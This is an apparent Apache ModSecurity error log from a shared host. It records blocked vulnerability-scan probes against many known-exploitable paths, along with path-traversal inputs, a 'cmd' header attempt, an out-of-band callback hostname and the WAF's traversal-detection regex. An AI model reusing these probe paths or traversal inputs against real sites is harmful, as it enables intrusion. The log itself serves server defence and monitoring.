[Tue May 26 12:52:10.255438 2026] [security2:error] [pid 461618:tid 461780] [client 23.94.40.119:60842] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ahVKIlyiSlSCHr1fdr2fxQAAAKU"]
[Tue May 26 12:52:10.256756 2026] [security2:error] [pid 461618:tid 461831] [client 23.94.40.119:60822] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/node/1"] [unique_id "ahVKIlyiSlSCHr1fdr2fxwAAANg"]
[Tue May 26 12:52:10.290240 2026] [ssl:error] [pid 461618:tid 461755] [client 23.94.40.119:60844] AH02032: Hostname www.madrasbarassociation.org.in.svijaykumar.in provided via SNI and hostname d8akjpc38ndbrs5c98fgkfofu4hsqxkbe.oast.fun provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 12:52:10.290357 2026] [security2:error] [pid 461618:tid 461755] [client 23.94.40.119:60844] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "421"] [hostname "d8akjpc38ndbrs5c98fgkfofu4hsqxkbe.oast.fun"] [uri "/-/jira/login/oauth/access_token"] [unique_id "ahVKIlyiSlSCHr1fdr2fzAAAAIw"]
[Tue May 26 12:52:10.690576 2026] [security2:error] [pid 461618:tid 461857] [client 23.94.40.119:60872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo/p/api/album.php"] [unique_id "ahVKIlyiSlSCHr1fdr2f1gAAAPI"]
[Tue May 26 12:52:10.695768 2026] [security2:error] [pid 461618:tid 461805] [client 23.94.40.119:60896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getImageMP4.php"] [unique_id "ahVKIlyiSlSCHr1fdr2f2QAAAL4"]
[Tue May 26 12:52:11.448293 2026] [security2:error] [pid 461618:tid 461758] [client 23.94.40.119:60920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/plugins/3rdPartyServers/ox3rdPartyServers/max.class.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f8AAAAI8"]
[Tue May 26 12:52:11.467888 2026] [security2:error] [pid 461618:tid 461868] [client 23.94.40.119:60928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo/p/api/album.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f8QAAAP0"]
[Tue May 26 12:52:11.529413 2026] [security2:error] [pid 461618:tid 461812] [client 23.94.40.119:60942] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/photo/p/api/album.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f9gAAAMU"]
[Tue May 26 12:52:11.817619 2026] [security2:error] [pid 461618:tid 461844] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKI1yiSlSCHr1fdr2f7wAAAOU"]
[Tue May 26 12:52:12.027849 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:60976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/objects/getSpiritsFromVideo.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gCAAAAKE"]
[Tue May 26 12:52:12.066999 2026] [security2:error] [pid 461618:tid 461840] [client 23.94.40.119:60980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/card_scan.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gCQAAAOE"]
[Tue May 26 12:52:12.564651 2026] [security2:error] [pid 461618:tid 461681] [remote 161.97.109.81:45970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gFAAAmz4"]
[Tue May 26 12:52:12.639240 2026] [cgid:error] [pid 461618:tid 461867] [client 23.94.40.119:32792] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/supportInstaller: script not found or unable to stat
[Tue May 26 12:52:12.802932 2026] [security2:error] [pid 461618:tid 461853] [client 76.37.131.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKJFyiSlSCHr1fdr2gEgAAAO4"]
[Tue May 26 12:52:13.645509 2026] [security2:error] [pid 461618:tid 461748] [client 23.94.40.119:32838] ModSecurity: Access denied with code 406 (phase 2). Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "61"] [id "390616"] [rev "2"] [msg "Atomicorp.com WAF Rules: POST request must have a Content-Length header"] [severity "WARNING"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/search/"] [unique_id "ahVKJVyiSlSCHr1fdr2gMwAAAIU"]
[Tue May 26 12:52:13.852796 2026] [security2:error] [pid 461618:tid 461772] [client 23.94.40.119:32846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKJVyiSlSCHr1fdr2gOwAAAJ0"]
[Tue May 26 12:52:13.986186 2026] [security2:error] [pid 461618:tid 461817] [client 23.94.40.119:32868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/php/connector.minimal.php"] [unique_id "ahVKJVyiSlSCHr1fdr2gQQAAAMo"]
[Tue May 26 12:52:14.171807 2026] [security2:error] [pid 461618:tid 461763] [client 23.94.40.119:32884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gRgAAAJQ"]
[Tue May 26 12:52:14.298576 2026] [security2:error] [pid 461618:tid 461804] [client 157.20.138.61:55598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gUgAAAL0"]
[Tue May 26 12:52:14.298734 2026] [security2:error] [pid 461618:tid 461804] [client 157.20.138.61:55598] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gUgAAAL0"]
[Tue May 26 12:52:14.627247 2026] [security2:error] [pid 461618:tid 461863] [client 23.94.40.119:32894] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/autodiscover"] [unique_id "ahVKJlyiSlSCHr1fdr2gVwAAAPg"]
[Tue May 26 12:52:14.695789 2026] [security2:error] [pid 461618:tid 461856] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKJlyiSlSCHr1fdr2gUQAAAPE"]
Use of uninitialized value $domain in hash element at /usr/local/cpanel/Cpanel/Email/AutoConfig.pm line 42.
[Tue May 26 12:52:16.043078 2026] [security2:error] [pid 461618:tid 461692] [remote 51.91.98.45:41184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVKJ1yiSlSCHr1fdr2ghgAAyEk"]
[Tue May 26 12:52:17.949325 2026] [security2:error] [pid 461618:tid 461754] [client 23.94.40.119:45252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/include/plugin/payment/alipay/pay.php"] [unique_id "ahVKKVyiSlSCHr1fdr2gwQAAAIs"]
[Tue May 26 12:52:17.979119 2026] [security2:error] [pid 461618:tid 461777] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKKVyiSlSCHr1fdr2guAAAAKI"]
[Tue May 26 12:52:18.635873 2026] [security2:error] [pid 461618:tid 461838] [client 23.94.40.119:45260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx"] [unique_id "ahVKKlyiSlSCHr1fdr2g4AAAAN8"]
[Tue May 26 12:52:19.228165 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:45288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:udid. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "\\x5c..\\x5c,ARGS:udid"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/mdm/client/v1/mdmLogUploader"] [unique_id "ahVKK1yiSlSCHr1fdr2g8AAAAJI"]
[Tue May 26 12:52:19.471710 2026] [security2:error] [pid 461618:tid 461820] [client 23.94.40.119:45328] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/seo-by-rank-math/readme.txt"] [unique_id "ahVKK1yiSlSCHr1fdr2g-wAAAM0"]
[Tue May 26 12:52:19.675219 2026] [security2:error] [pid 461618:tid 461841] [client 23.94.40.119:45338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/service/rest/beta/repositories/bower/group"] [unique_id "ahVKK1yiSlSCHr1fdr2g_wAAAOI"]
[Tue May 26 12:52:19.867609 2026] [security2:error] [pid 461618:tid 461845] [client 23.94.40.119:45366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/mailingupgrade.php"] [unique_id "ahVKK1yiSlSCHr1fdr2hAwAAAOY"]
[Tue May 26 12:52:19.929800 2026] [security2:error] [pid 461618:tid 461799] [client 23.94.40.119:45352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ahVKK1yiSlSCHr1fdr2hBwAAALg"]
[Tue May 26 12:52:20.413253 2026] [security2:error] [pid 461618:tid 461757] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKK1yiSlSCHr1fdr2hCgAAAI4"]
[Tue May 26 12:52:20.899863 2026] [security2:error] [pid 461618:tid 461798] [client 23.94.40.119:45426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/installer/index.php"] [unique_id "ahVKLFyiSlSCHr1fdr2hKQAAALc"]
[Tue May 26 12:52:21.568866 2026] [security2:error] [pid 461618:tid 461819] [client 23.94.40.119:45444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVKLVyiSlSCHr1fdr2hOgAAAMw"]
[Tue May 26 12:52:21.945276 2026] [cgid:error] [pid 461618:tid 461773] [client 23.94.40.119:45474] AH01264: stderr from /home2/svijakqj/madrasbarassociation.org.in/cgi-bin/login.cgi: script not found or unable to stat
[Tue May 26 12:52:22.383391 2026] [security2:error] [pid 461618:tid 461828] [client 23.94.40.119:45504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/roundcube/installer/index.php"] [unique_id "ahVKLlyiSlSCHr1fdr2hXQAAANU"]
[Tue May 26 12:52:22.388384 2026] [security2:error] [pid 461618:tid 461812] [client 23.94.40.119:45496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ahVKLlyiSlSCHr1fdr2hXgAAAMU"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/webadmin/admin/service_manager_data.php
[Tue May 26 12:52:22.443111 2026] [core:crit] [pid 461618:tid 461806] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:52:23.362079 2026] [security2:error] [pid 461618:tid 461761] [client 23.94.40.119:45570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/pandora_console/ajax.php"] [unique_id "ahVKL1yiSlSCHr1fdr2hmgAAAJI"]
[Tue May 26 12:52:23.752760 2026] [core:crit] [pid 461618:tid 461806] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:52:23.830685 2026] [security2:error] [pid 461618:tid 461776] [client 23.94.40.119:45564] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:page. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:page"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ahVKL1yiSlSCHr1fdr2hsgAAAKE"]
[Tue May 26 12:52:23.867227 2026] [security2:error] [pid 461618:tid 461873] [client 23.94.40.119:45596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lib/crud/userprocess.php"] [unique_id "ahVKL1yiSlSCHr1fdr2htAAAAQI"]
[Tue May 26 12:52:23.876041 2026] [security2:error] [pid 461618:tid 461826] [client 23.94.40.119:45600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "^cmd$" at REQUEST_HEADERS_NAMES:cmd. [file "/opt/mod_security/hg_rules.conf"] [line "901"] [id "900073"] [msg "HTTP_CMD Header attempted"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ahVKL1yiSlSCHr1fdr2htQAAANM"]
[Tue May 26 12:52:23.909790 2026] [security2:error] [pid 461618:tid 461859] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKL1yiSlSCHr1fdr2hoQAAAPQ"]
[Tue May 26 12:52:24.159496 2026] [security2:error] [pid 461618:tid 461839] [client 23.94.40.119:45626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/mainfunction.cgi/cvmcfgupload"] [unique_id "ahVKMFyiSlSCHr1fdr2hvwAAAOA"]
[Tue May 26 12:52:24.242654 2026] [security2:error] [pid 461618:tid 461813] [client 23.94.40.119:45656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/include/exportUser.php"] [unique_id "ahVKMFyiSlSCHr1fdr2hxgAAAMY"]
[Tue May 26 12:52:24.391133 2026] [security2:error] [pid 461618:tid 461710] [remote 216.73.217.74:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/hni-cash.php"] [unique_id "ahVKMFyiSlSCHr1fdr2hxwAAzVs"]
